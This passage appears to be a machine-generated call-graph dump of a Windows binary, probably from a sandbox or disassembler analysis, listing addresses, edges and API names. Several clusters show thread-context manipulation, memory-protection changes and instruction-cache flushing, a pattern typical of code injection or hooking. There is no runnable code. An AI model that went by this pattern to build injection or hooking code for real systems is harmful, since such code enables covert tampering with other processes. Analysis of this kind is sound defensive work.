GetProcAddress 8662->8663 8664 2a66130b94a 8662->8664 8663->8664 8665 2a66130b95b FreeLibrary 8664->8665 8666 2a66130b962 8664->8666 8665->8666 8666->8653 8679 2a66130c558 EnterCriticalSection 8667->8679 7667 2a66130acec 7670 2a6613090c0 7667->7670 7669 2a66130ad15 7671 2a6613090e1 7670->7671 7672 2a661309116 7670->7672 7671->7672 7674 2a66130c328 7671->7674 7672->7669 7675 2a66130c33f 7674->7675 7676 2a66130c335 7674->7676 7683 2a66130d1f4 7675->7683 7676->7675 7681 2a66130c35a 7676->7681 7678 2a66130c346 7686 2a66130d04c 7678->7686 7680 2a66130c352 7680->7672 7681->7680 7682 2a66130d1f4 __std_exception_copy 13 API calls 7681->7682 7682->7678 7689 2a66130cb10 7683->7689 7757 2a66130cef8 7686->7757 7690 2a66130cb59 GetLastError 7689->7690 7694 2a66130cb2f __std_exception_copy 7689->7694 7691 2a66130cb6c 7690->7691 7693 2a66130cb8a SetLastError 7691->7693 7695 2a66130cb87 7691->7695 7697 2a66130c940 __std_exception_copy 11 API calls 7691->7697 7692 2a66130cb54 7692->7678 7693->7692 7694->7692 7698 2a66130c940 GetLastError 7694->7698 7695->7693 7697->7695 7699 2a66130c966 7698->7699 7700 2a66130c96c SetLastError 7699->7700 7716 2a66130d220 7699->7716 7701 2a66130c9e5 7700->7701 7701->7692 7704 2a66130c9a5 FlsSetValue 7707 2a66130c9c8 7704->7707 7708 2a66130c9b1 FlsSetValue 7704->7708 7705 2a66130c995 FlsSetValue 7723 2a66130d2a0 7705->7723 7729 2a66130c758 7707->7729 7710 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7708->7710 7712 2a66130c9c6 SetLastError 7710->7712 7712->7701 7721 2a66130d231 __std_exception_copy 7716->7721 7717 2a66130d282 7720 2a66130d1f4 __std_exception_copy 12 API calls 7717->7720 7718 2a66130d266 HeapAlloc 7719 2a66130c987 7718->7719 7718->7721 7719->7704 7719->7705 7720->7719 7721->7717 7721->7718 7734 2a66130b470 7721->7734 7724 2a66130d2a5 HeapFree 7723->7724 7725 2a66130c9a3 7723->7725 7724->7725 7726 2a66130d2c0 GetLastError 7724->7726 7725->7700 7727 2a66130d2cd Concurrency::details::SchedulerProxy::DeleteThis 7726->7727 7728 2a66130d1f4 __std_exception_copy 11 API calls 7727->7728 7728->7725 7743 2a66130c630 7729->7743 7737 2a66130b4c0 7734->7737 7742 2a66130c558 EnterCriticalSection 7737->7742 7755 2a66130c558 EnterCriticalSection 7743->7755 7758 2a66130cf23 7757->7758 7765 2a66130cf94 7758->7765 7760 2a66130cf4a 7762 2a66130cf6d 7760->7762 7775 2a66130c3e0 7760->7775 7763 2a66130cf82 7762->7763 7764 2a66130c3e0 _invalid_parameter_noinfo 17 API calls 7762->7764 7763->7680 7764->7763 7788 2a66130ccc8 7765->7788 7770 2a66130cfcf 7770->7760 7776 2a66130c438 7775->7776 7777 2a66130c3ef GetLastError 7775->7777 7776->7762 7778 2a66130c404 7777->7778 7779 2a66130cba0 _invalid_parameter_noinfo 14 API calls 7778->7779 7780 2a66130c41e SetLastError 7779->7780 7780->7776 7781 2a66130c441 7780->7781 7782 2a66130c3e0 _invalid_parameter_noinfo 15 API calls 7781->7782 7783 2a66130c467 7782->7783 7828 2a66130ffe8 7783->7828 7789 2a66130cd1f 7788->7789 7790 2a66130cce4 GetLastError 7788->7790 7789->7770 7794 2a66130cd34 7789->7794 7791 2a66130ccf4 7790->7791 7801 2a66130cba0 7791->7801 7795 2a66130cd68 7794->7795 7796 2a66130cd50 GetLastError SetLastError 7794->7796 7795->7770 7797 2a66130d06c IsProcessorFeaturePresent 7795->7797 7796->7795 7798 2a66130d07f 7797->7798 7806 2a66130cd80 7798->7806 7802 2a66130cbc8 FlsGetValue 7801->7802 7803 2a66130cbc4 7801->7803 7802->7803 7804 2a66130cbde SetLastError 7803->7804 7805 2a66130c940 __std_exception_copy 13 API calls 7803->7805 7804->7789 7805->7804 7807 2a66130cdba _invalid_parameter_noinfo 7806->7807 7808 2a66130cde2 RtlCaptureContext RtlLookupFunctionEntry 7807->7808 7809 2a66130ce2e RtlVirtualUnwind 7808->7809 7810 2a66130ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7808->7810 7809->7810 7811 2a66130ceb6 _invalid_parameter_noinfo 7810->7811 7814 2a661308070 7811->7814 7815 2a661308079 7814->7815 7816 2a661308084 GetCurrentProcess TerminateProcess 7815->7816 7817 2a661308848 IsProcessorFeaturePresent 7815->7817 7818 2a661308860 7817->7818 7823 2a66130891c RtlCaptureContext 7818->7823 7824 2a661308936 RtlLookupFunctionEntry 7823->7824 7825 2a66130894c RtlVirtualUnwind 7824->7825 7826 2a661308873 7824->7826 7825->7824 7825->7826 7827 2a661308814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7826->7827 7829 2a661310001 7828->7829 7831 2a66130c48f 7828->7831 7829->7831 7836 2a661310a40 7829->7836 7832 2a661310054 7831->7832 7833 2a66131006d 7832->7833 7834 2a66130c49f 7832->7834 7833->7834 7854 2a66130e8c4 7833->7854 7834->7762 7845 2a66130cab0 7836->7845 7838 2a661310a4f 7844 2a661310a95 7838->7844 7853 2a66130c558 EnterCriticalSection 7838->7853 7844->7831 7846 2a66130cb10 __std_exception_copy 13 API calls 7845->7846 7848 2a66130cab9 7846->7848 7847 2a66130cabe 7847->7838 7848->7847 7849 2a66130cae8 FlsGetValue 7848->7849 7851 2a66130cae4 7848->7851 7849->7851 7850 2a66130cafe 7850->7838 7851->7850 7852 2a66130c940 __std_exception_copy 13 API calls 7851->7852 7852->7850 7855 2a66130cab0 _invalid_parameter_noinfo 14 API calls 7854->7855 7856 2a66130e8cd 7855->7856 8680 2a661302ff0 8681 2a661303061 8680->8681 8682 2a661303384 8681->8682 8683 2a66130308d GetModuleHandleA 8681->8683 8684 2a66130309f GetProcAddress 8683->8684 8685 2a6613030b1 8683->8685 8684->8685 8685->8682 8686 2a6613030d8 StrCmpNIW 8685->8686 8686->8682 8687 2a6613030fd 8686->8687 8687->8682 8688 2a661301a30 6 API calls 8687->8688 8689 2a6613032b9 lstrlenW 8687->8689 8690 2a66130320f lstrlenW 8687->8690 8691 2a661303f88 StrCmpNIW 8687->8691 8692 2a661301cfc StrCmpIW StrCmpW 8687->8692 8688->8687 8689->8687 8690->8687 8691->8687 8692->8687 8286 2a66130f370 VirtualProtect 9096 2a66130f870 9097 2a66130f8a0 9096->9097 9099 2a66130f8c7 9096->9099 9098 2a66130cb10 __std_exception_copy 13 API calls 9097->9098 9097->9099 9103 2a66130f8b4 9097->9103 9098->9103 9100 2a66130f99c 9099->9100 9119 2a66130c558 EnterCriticalSection 9099->9119 9104 2a66130fab3 9100->9104 9106 2a66130fa03 9100->9106 9112 2a66130f9ca 9100->9112 9101 2a66130f904 9103->9099 9103->9101 9105 2a66130f949 9103->9105 9107 2a66130fac0 9104->9107 9121 2a66130c5ac LeaveCriticalSection 9104->9121 9108 2a66130d1f4 __std_exception_copy 13 API calls 9105->9108 9116 2a66130fa61 9106->9116 9120 2a66130c5ac LeaveCriticalSection 9106->9120 9111 2a66130f94e 9108->9111 9113 2a66130d04c _invalid_parameter_noinfo 38 API calls 9111->9113 9112->9106 9114 2a66130cab0 _invalid_parameter_noinfo 14 API calls 9112->9114 9113->9101 9115 2a66130f9f3 9114->9115 9117 2a66130cab0 _invalid_parameter_noinfo 14 API calls 9115->9117 9118 2a66130cab0 14 API calls _invalid_parameter_noinfo 9116->9118 9117->9106 9118->9116 9122 2a661308672 9123 2a6613090c0 __std_exception_copy 38 API calls 9122->9123 9124 2a66130869d 9123->9124 7857 2a6613146f5 7866 2a661309324 7857->7866 7859 2a66131470d 7860 2a661309324 __CxxCallCatchBlock 9 API calls 7859->7860 7861 2a661314728 7860->7861 7862 2a661309324 __CxxCallCatchBlock 9 API calls 7861->7862 7863 2a66131473c 7862->7863 7864 2a661309324 __CxxCallCatchBlock 9 API calls 7863->7864 7865 2a66131477e 7864->7865 7869 2a661309340 7866->7869 7868 2a66130932d 7868->7859 7870 2a661309358 7869->7870 7871 2a66130935f GetLastError 7869->7871 7870->7868 7881 2a661309c8c 7871->7881 7882 2a661309aac __vcrt_FlsAlloc 5 API calls 7881->7882 7883 2a661309cb3 TlsGetValue 7882->7883 8287 2a661305974 8288 2a66130597a 8287->8288 8299 2a661307fa0 8288->8299 8292 2a661305a77 8293 2a6613059de 8292->8293 8296 2a661305bfd 8292->8296 8312 2a661307b80 8292->8312 8295 2a661305cfb 8296->8295 8297 2a661305d77 VirtualProtect 8296->8297 8297->8293 8298 2a661305da3 GetLastError 8297->8298 8298->8293 8302 2a661307fab 8299->8302 8300 2a6613059bd 8300->8293 8308 2a661304400 8300->8308 8301 2a66130b470 __std_exception_copy 2 API calls 8301->8302 8302->8300 8302->8301 8303 2a661307fca 8302->8303 8304 2a661307fd5 8303->8304 8318 2a6613087b8 8303->8318 8322 2a6613087d8 8304->8322 8309 2a66130441d 8308->8309 8311 2a66130448c 8309->8311 8331 2a661304670 8309->8331 8311->8292 8313 2a661307bc7 8312->8313 8356 2a661307950 8313->8356 8316 2a661308070 _invalid_parameter_noinfo 8 API calls 8317 2a661307bf1 8316->8317 8317->8292 8319 2a6613087c6 std::bad_alloc::bad_alloc 8318->8319 8326 2a661309178 8319->8326 8321 2a6613087d7 8323 2a6613087e6 std::bad_alloc::bad_alloc 8322->8323 8324 2a661309178 Concurrency::cancel_current_task 2 API calls 8323->8324 8325 2a661307fdb 8324->8325 8327 2a661309197 8326->8327 8328 2a6613091c0 RtlPcToFileHeader 8327->8328 8329 2a6613091e2 RaiseException 8327->8329 8330 2a6613091d8 8328->8330 8329->8321 8330->8329 8332 2a661304694 8331->8332 8338 2a6613046b7 8331->8338 8332->8338 8345 2a661304120 8332->8345 8333 2a6613046ed 8334 2a66130471d 8333->8334 8339 2a661304250 2 API calls 8333->8339 8337 2a661304753 8334->8337 8343 2a661304120 3 API calls 8334->8343 8340 2a66130476f 8337->8340 8341 2a661304120 3 API calls 8337->8341 8338->8333 8351 2a661304250 8338->8351 8339->8334 8342 2a66130478b 8340->8342 8344 2a661304250 2 API calls 8340->8344 8341->8340 8342->8311 8343->8337 8344->8342 8350 2a661304141 8345->8350 8346 2a6613041b0 8346->8338 8347 2a661304196 VirtualQuery 8347->8346 8347->8350 8348 2a6613041ca VirtualAlloc 8348->8346 8349 2a6613041fb GetLastError 8348->8349 8349->8350 8350->8346 8350->8347 8350->8348 8352 2a661304268 8351->8352 8353 2a6613042bd VirtualQuery 8352->8353 8354 2a6613042d7 8352->8354 8355 2a661304322 GetLastError 8352->8355 8353->8352 8353->8354 8354->8333 8355->8352 8357 2a66130796b 8356->8357 8358 2a66130798f 8357->8358 8359 2a661307981 SetLastError 8357->8359 8358->8316 8359->8358 9125 2a661302ed8 9127 2a661302f35 9125->9127 9126 2a661302f50 9127->9126 9128 2a6613038a8 3 API calls 9127->9128 9128->9126 8360 2a66130c1d8 8361 2a66130c1f1 8360->8361 8362 2a66130c209 8360->8362 8361->8362 8363 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8361->8363 8363->8362 8693 2a66130d658 8694 2a66130d67d 8693->8694 8698 2a66130d694 8693->8698 8695 2a66130d1f4 __std_exception_copy 13 API calls 8694->8695 8696 2a66130d682 8695->8696 8699 2a66130d04c _invalid_parameter_noinfo 38 API calls 8696->8699 8697 2a66130d724 8700 2a66130bb54 13 API calls 8697->8700 8698->8697 8708 2a66130d6da 8698->8708 8710 2a66130d7b6 8698->8710 8726 2a66130d894 8698->8726 8788 2a66130da18 8698->8788 8701 2a66130d68d 8699->8701 8702 2a66130d77c 8700->8702 8704 2a66130d784 8702->8704 8714 2a66130d7d7 8702->8714 8707 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8704->8707 8706 2a66130d836 8711 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8706->8711 8709 2a66130d78b 8707->8709 8713 2a66130d6fd 8708->8713 8717 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8708->8717 8709->8713 8718 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8709->8718 8710->8713 8716 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8710->8716 8712 2a66130d841 8711->8712 8715 2a66130d85a 8712->8715 8720 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8712->8720 8719 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8713->8719 8714->8706 8714->8714 8723 2a66130d87c 8714->8723 8825 2a661310eb8 8714->8825 8721 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8715->8721 8716->8710 8717->8708 8718->8709 8719->8701 8720->8712 8721->8701 8724 2a66130d06c _invalid_parameter_noinfo 17 API calls 8723->8724 8725 2a66130d891 8724->8725 8727 2a66130d8c2 8726->8727 8727->8727 8728 2a66130d8de 8727->8728 8729 2a66130d220 __std_exception_copy 13 API calls 8727->8729 8728->8698 8730 2a66130d90d 8729->8730 8731 2a66130d926 8730->8731 8732 2a661310eb8 38 API calls 8730->8732 8733 2a661310eb8 38 API calls 8731->8733 8735 2a66130d9fc 8731->8735 8732->8731 8734 2a66130d943 8733->8734 8734->8735 8736 2a66130d97f 8734->8736 8738 2a66130d98d 8734->8738 8739 2a66130d962 8734->8739 8737 2a66130d06c _invalid_parameter_noinfo 17 API calls 8735->8737 8741 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8736->8741 8749 2a66130da17 8737->8749 8742 2a66130d977 8738->8742 8834 2a66130eee0 8738->8834 8740 2a66130d220 __std_exception_copy 13 API calls 8739->8740 8743 2a66130d96d 8740->8743 8741->8735 8742->8736 8746 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8742->8746 8747 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8743->8747 8745 2a66130da7a 8750 2a66130da8c 8745->8750 8757 2a66130daa1 8745->8757 8746->8736 8747->8742 8748 2a66130d9b5 8751 2a66130d9ba 8748->8751 8752 2a66130d9d0 8748->8752 8749->8745 8843 2a6613113d8 8749->8843 8755 2a66130d894 52 API calls 8750->8755 8756 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8751->8756 8754 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8752->8754 8754->8736 8782 2a66130da9c 8755->8782 8756->8742 8759 2a66130dd78 14 API calls 8757->8759 8758 2a661308070 _invalid_parameter_noinfo 8 API calls 8760 2a66130dd64 8758->8760 8761 2a66130db0b 8759->8761 8760->8698 8762 2a66130db1a 8761->8762 8763 2a66130f198 9 API calls 8761->8763 8852 2a66130d30c 8762->8852 8763->8762 8766 2a66130dba8 8767 2a66130d894 52 API calls 8766->8767 8769 2a66130dbb8 8767->8769 8768 2a66130dd78 14 API calls 8771 2a66130dbd2 8768->8771 8770 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8769->8770 8769->8782 8770->8782 8771->8768 8772 2a66130f198 9 API calls 8771->8772 8774 2a66130d894 52 API calls 8771->8774 8775 2a66130dcc8 FindNextFileW 8771->8775 8776 2a66130dd2a 8771->8776 8778 2a66130d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8771->8778 8874 2a66130d4ac 8771->8874 8772->8771 8774->8771 8775->8771 8777 2a66130dce0 8775->8777 8780 2a66130dd38 FindClose 8776->8780 8785 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8776->8785 8779 2a66130dd0c FindClose 8777->8779 8896 2a661310b20 8777->8896 8778->8771 8779->8782 8784 2a66130dd1c 8779->8784 8781 2a66130dd48 8780->8781 8780->8782 8786 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8781->8786 8782->8758 8787 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8784->8787 8785->8780 8786->8782 8787->8782 8789 2a66130da58 8788->8789 8790 2a66130da7a 8788->8790 8789->8790 8792 2a6613113d8 38 API calls 8789->8792 8791 2a66130da8c 8790->8791 8794 2a66130daa1 8790->8794 8793 2a66130d894 56 API calls 8791->8793 8792->8789 8819 2a66130da9c 8793->8819 8796 2a66130dd78 14 API calls 8794->8796 8795 2a661308070 _invalid_parameter_noinfo 8 API calls 8797 2a66130dd64 8795->8797 8798 2a66130db0b 8796->8798 8797->8698 8799 2a66130db1a 8798->8799 8800 2a66130f198 9 API calls 8798->8800 8801 2a66130d30c 16 API calls 8799->8801 8800->8799 8802 2a66130db7b FindFirstFileExW 8801->8802 8803 2a66130dba8 8802->8803 8809 2a66130dbd2 8802->8809 8804 2a66130d894 56 API calls 8803->8804 8806 2a66130dbb8 8804->8806 8805 2a66130dd78 14 API calls 8805->8809 8807 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8806->8807 8806->8819 8807->8819 8808 2a66130f198 9 API calls 8808->8809 8809->8805 8809->8808 8810 2a66130d4ac 16 API calls 8809->8810 8811 2a66130d894 56 API calls 8809->8811 8812 2a66130dcc8 FindNextFileW 8809->8812 8813 2a66130dd2a 8809->8813 8815 2a66130d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8809->8815 8810->8809 8811->8809 8812->8809 8814 2a66130dce0 8812->8814 8817 2a66130dd38 FindClose 8813->8817 8822 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8813->8822 8816 2a66130dd0c FindClose 8814->8816 8820 2a661310b20 38 API calls 8814->8820 8815->8809 8816->8819 8821 2a66130dd1c 8816->8821 8818 2a66130dd48 8817->8818 8817->8819 8823 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8818->8823 8819->8795 8820->8816 8824 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8821->8824 8822->8817 8823->8819 8824->8819 8829 2a661310ed5 8825->8829 8826 2a661310eda 8827 2a661310ef0 8826->8827 8828 2a66130d1f4 __std_exception_copy 13 API calls 8826->8828 8827->8714 8830 2a661310ee4 8828->8830 8829->8826 8829->8827 8832 2a661310f24 8829->8832 8831 2a66130d04c _invalid_parameter_noinfo 38 API calls 8830->8831 8831->8827 8832->8827 8833 2a66130d1f4 __std_exception_copy 13 API calls 8832->8833 8833->8830 8835 2a66130ef1f 8834->8835 8836 2a66130ef02 8834->8836 8838 2a66130ef29 8835->8838 8904 2a6613119f0 8835->8904 8836->8835 8837 2a66130ef10 8836->8837 8839 2a66130d1f4 __std_exception_copy 13 API calls 8837->8839 8911 2a661311a40 8838->8911 8841 2a66130ef15 8839->8841 8841->8748 8844 2a6613113e0 8843->8844 8845 2a6613113f5 8844->8845 8846 2a66131140e 8844->8846 8847 2a66130d1f4 __std_exception_copy 13 API calls 8845->8847 8849 2a66130dd78 14 API calls 8846->8849 8851 2a661311405 8846->8851 8848 2a6613113fa 8847->8848 8850 2a66130d04c _invalid_parameter_noinfo 38 API calls 8848->8850 8849->8851 8850->8851 8851->8749 8853 2a66130d336 8852->8853 8854 2a66130d35a 8852->8854 8857 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8853->8857 8861 2a66130d345 FindFirstFileExW 8853->8861 8855 2a66130d3bf 8854->8855 8856 2a66130d35f 8854->8856 8858 2a66130ec58 MultiByteToWideChar 8855->8858 8859 2a66130d374 8856->8859 8856->8861 8862 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8856->8862 8857->8861 8869 2a66130d3db 8858->8869 8863 2a66130c5d0 14 API calls 8859->8863 8860 2a66130d3e2 GetLastError 8864 2a66130d184 13 API calls 8860->8864 8861->8766 8861->8771 8862->8859 8863->8861 8867 2a66130d3ef 8864->8867 8865 2a66130d420 8865->8861 8866 2a66130ec58 MultiByteToWideChar 8865->8866 8870 2a66130d47a 8866->8870 8871 2a66130d1f4 __std_exception_copy 13 API calls 8867->8871 8868 2a66130d413 8873 2a66130c5d0 14 API calls 8868->8873 8869->8860 8869->8865 8869->8868 8872 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8869->8872 8870->8860 8870->8861 8871->8861 8872->8868 8873->8865 8875 2a66130d4d6 8874->8875 8876 2a66130d4fa 8874->8876 8878 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8875->8878 8885 2a66130d4e5 8875->8885 8877 2a66130d55f 8876->8877 8881 2a66130d500 8876->8881 8879 2a66130ece8 WideCharToMultiByte 8877->8879 8878->8885 8891 2a66130d583 8879->8891 8880 2a66130d515 8884 2a66130c5d0 14 API calls 8880->8884 8881->8880 8883 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8881->8883 8881->8885 8882 2a66130d58a GetLastError 8886 2a66130d184 13 API calls 8882->8886 8883->8880 8884->8885 8885->8771 8889 2a66130d597 8886->8889 8887 2a66130d5c7 8887->8885 8888 2a66130ece8 WideCharToMultiByte 8887->8888 8893 2a66130d629 8888->8893 8894 2a66130d1f4 __std_exception_copy 13 API calls 8889->8894 8890 2a66130d5bb 8892 2a66130c5d0 14 API calls 8890->8892 8891->8882 8891->8887 8891->8890 8895 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8891->8895 8892->8887 8893->8882 8893->8885 8894->8885 8895->8890 8897 2a661310b52 8896->8897 8898 2a66130d1f4 __std_exception_copy 13 API calls 8897->8898 8903 2a661310b67 8897->8903 8899 2a661310b5c 8898->8899 8900 2a66130d04c _invalid_parameter_noinfo 38 API calls 8899->8900 8900->8903 8901 2a661308070 _invalid_parameter_noinfo 8 API calls 8902 2a661310ea8 8901->8902 8902->8779 8903->8901 8905 2a6613119f9 8904->8905 8906 2a661311a12 HeapSize 8904->8906 8907 2a66130d1f4 __std_exception_copy 13 API calls 8905->8907 8908 2a6613119fe 8907->8908 8909 2a66130d04c _invalid_parameter_noinfo 38 API calls 8908->8909 8910 2a661311a09 8909->8910 8910->8838 8912 2a661311a5f 8911->8912 8913 2a661311a55 8911->8913 8915 2a661311a64 8912->8915 8921 2a661311a6b __std_exception_copy 8912->8921 8914 2a66130c5d0 14 API calls 8913->8914 8919 2a661311a5d 8914->8919 8916 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8915->8916 8916->8919 8917 2a661311a9e HeapReAlloc 8917->8919 8917->8921 8918 2a661311a71 8920 2a66130d1f4 __std_exception_copy 13 API calls 8918->8920 8919->8841 8920->8919 8921->8917 8921->8918 8922 2a66130b470 __std_exception_copy 2 API calls 8921->8922 8922->8921 8364 2a6613025dc 8366 2a66130265a 8364->8366 8365 2a661302777 8366->8365 8367 2a6613026bf GetFileType 8366->8367 8368 2a6613026cd StrCpyW 8367->8368 8369 2a6613026e1 8367->8369 8373 2a6613026ee 8368->8373 8375 2a661301ad4 GetFinalPathNameByHandleW 8369->8375 8373->8365 8380 2a661303f88 8373->8380 8383 2a661303708 StrCmpIW 8373->8383 8387 2a661301dd4 8373->8387 8376 2a661301b3d 8375->8376 8377 2a661301afe StrCmpNIW 8375->8377 8376->8373 8377->8376 8378 2a661301b18 lstrlenW 8377->8378 8378->8376 8379 2a661301b2a StrCpyW 8378->8379 8379->8376 8381 2a661303f95 StrCmpNIW 8380->8381 8382 2a661303faa 8380->8382 8381->8382 8382->8373 8384 2a66130373a StrCpyW StrCatW 8383->8384 8385 2a661303751 PathCombineW 8383->8385 8386 2a66130375a 8384->8386 8385->8386 8386->8373 8388 2a661301deb 8387->8388 8389 2a661301df4 8387->8389 8390 2a661301530 2 API calls 8388->8390 8389->8373 8390->8389 9129 2a66130f6dc 9130 2a66130f6e8 9129->9130 9132 2a66130f70f 9130->9132 9133 2a661311c0c 9130->9133 9134 2a661311c11 9133->9134 9138 2a661311c4c 9133->9138 9135 2a661311c32 DeleteCriticalSection 9134->9135 9136 2a661311c44 9134->9136 9135->9135 9135->9136 9137 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9136->9137 9137->9138 9138->9130 8923 2a66131465f 8924 2a661314677 8923->8924 8930 2a6613146e2 8923->8930 8925 2a661309324 __CxxCallCatchBlock 9 API calls 8924->8925 8924->8930 8926 2a6613146c4 8925->8926 8927 2a661309324 __CxxCallCatchBlock 9 API calls 8926->8927 8928 2a6613146d9 8927->8928 8929 2a66130c2f4 14 API calls 8928->8929 8929->8930 8931 2a66131485e 8932 2a661309324 __CxxCallCatchBlock 9 API calls 8931->8932 8933 2a66131486c 8932->8933 8934 2a661314877 8933->8934 8935 2a661309324 __CxxCallCatchBlock 9 API calls 8933->8935 8935->8934 7885 2a661307f60 7886 2a661307f7c 7885->7886 7887 2a661307f81 7885->7887 7889 2a661308090 7886->7889 7890 2a661308127 7889->7890 7891 2a6613080b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7889->7891 7890->7887 7891->7890 7892 2a661313960 7902 2a661308ca0 7892->7902 7894 2a661313988 7896 2a661309324 __CxxCallCatchBlock 9 API calls 7897 2a661313998 7896->7897 7898 2a661309324 __CxxCallCatchBlock 9 API calls 7897->7898 7899 2a6613139a1 7898->7899 7906 2a66130c2f4 7899->7906 7904 2a661308cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7902->7904 7903 2a661308dd1 7903->7894 7903->7896 7904->7903 7905 2a661308d94 RtlUnwindEx 7904->7905 7905->7904 7907 2a66130cab0 _invalid_parameter_noinfo 14 API calls 7906->7907 7908 2a66130c2fd 7907->7908 9139 2a6613106e0 9140 2a6613106e9 9139->9140 9141 2a6613106f9 9139->9141 9142 2a66130d1f4 __std_exception_copy 13 API calls 9140->9142 9143 2a6613106ee 9142->9143 9144 2a66130d04c _invalid_parameter_noinfo 38 API calls 9143->9144 9144->9141 8391 2a6613063e3 8392 2a6613063f0 8391->8392 8393 2a6613063fc GetThreadContext 8392->8393 8400 2a66130655a 8392->8400 8394 2a661306422 8393->8394 8393->8400 8399 2a661306449 8394->8399 8394->8400 8395 2a66130663e 8397 2a66130665e 8395->8397 8409 2a661304b20 8395->8409 8396 2a661306581 VirtualProtect FlushInstructionCache 8396->8400 8413 2a661305530 GetCurrentProcess 8397->8413 8402 2a6613064cd 8399->8402 8403 2a6613064a6 SetThreadContext 8399->8403 8400->8395 8400->8396 8403->8402 8404 2a661306677 ResumeThread 8406 2a661306663 8404->8406 8405 2a6613066b7 8407 2a661308070 _invalid_parameter_noinfo 8 API calls 8405->8407 8406->8404 8406->8405 8408 2a6613066ff 8407->8408 8411 2a661304b3c 8409->8411 8410 2a661304b9f 8410->8397 8411->8410 8412 2a661304b52 VirtualFree 8411->8412 8412->8411 8414 2a66130554c 8413->8414 8415 2a661305562 VirtualProtect FlushInstructionCache 8414->8415 8416 2a661305593 8414->8416 8415->8414 8416->8406 8417 2a66130f3e4 8418 2a66130f41d 8417->8418 8419 2a66130f3ee 8417->8419 8419->8418 8420 2a66130f403 FreeLibrary 8419->8420 8420->8419 8421 2a6613133e4 8422 2a6613133fb 8421->8422 8423 2a6613133f5 CloseHandle 8421->8423 8423->8422 7918 2a66130ad48 7919 2a661309324 __CxxCallCatchBlock 9 API calls 7918->7919 7920 2a66130ad7d 7919->7920 7921 2a661309324 __CxxCallCatchBlock 9 API calls 7920->7921 7922 2a66130ad8b __except_validate_context_record 7921->7922 7923 2a661309324 __CxxCallCatchBlock 9 API calls 7922->7923 7924 2a66130adcf 7923->7924 7925 2a661309324 __CxxCallCatchBlock 9 API calls 7924->7925 7926 2a66130add8 7925->7926 7927 2a661309324 __CxxCallCatchBlock 9 API calls 7926->7927 7928 2a66130ade1 7927->7928 7941 2a66130993c 7928->7941 7931 2a661309324 __CxxCallCatchBlock 9 API calls 7932 2a66130ae11 __CxxCallCatchBlock 7931->7932 7948 2a661309978 7932->7948 7934 2a66130aeeb __CxxCallCatchBlock 7935 2a661309324 __CxxCallCatchBlock 9 API calls 7934->7935 7936 2a66130aefe 7935->7936 7937 2a661309324 __CxxCallCatchBlock 9 API calls 7936->7937 7940 2a66130af07 7937->7940 7942 2a661309324 __CxxCallCatchBlock 9 API calls 7941->7942 7943 2a66130994d 7942->7943 7944 2a661309958 7943->7944 7945 2a661309324 __CxxCallCatchBlock 9 API calls 7943->7945 7946 2a661309324 __CxxCallCatchBlock 9 API calls 7944->7946 7945->7944 7947 2a661309969 7946->7947 7947->7931 7947->7932 7949 2a661309324 __CxxCallCatchBlock 9 API calls 7948->7949 7950 2a66130998a 7949->7950 7951 2a6613099c5 7950->7951 7952 2a661309324 __CxxCallCatchBlock 9 API calls 7950->7952 7953 2a661309995 7952->7953 7953->7951 7954 2a661309324 __CxxCallCatchBlock 9 API calls 7953->7954 7955 2a6613099b6 7954->7955 7955->7934 7956 2a661308ff8 7955->7956 7957 2a661309324 __CxxCallCatchBlock 9 API calls 7956->7957 7958 2a661309006 7957->7958 7958->7934 8936 2a661314848 8939 2a66130904c 8936->8939 8940 2a661309076 8939->8940 8941 2a661309064 8939->8941 8942 2a661309324 __CxxCallCatchBlock 9 API calls 8940->8942 8941->8940 8943 2a66130906c 8941->8943 8945 2a66130907b 8942->8945 8944 2a661309074 8943->8944 8946 2a661309324 __CxxCallCatchBlock 9 API calls 8943->8946 8945->8944 8948 2a661309324 __CxxCallCatchBlock 9 API calls 8945->8948 8947 2a66130909b 8946->8947 8949 2a661309324 __CxxCallCatchBlock 9 API calls 8947->8949 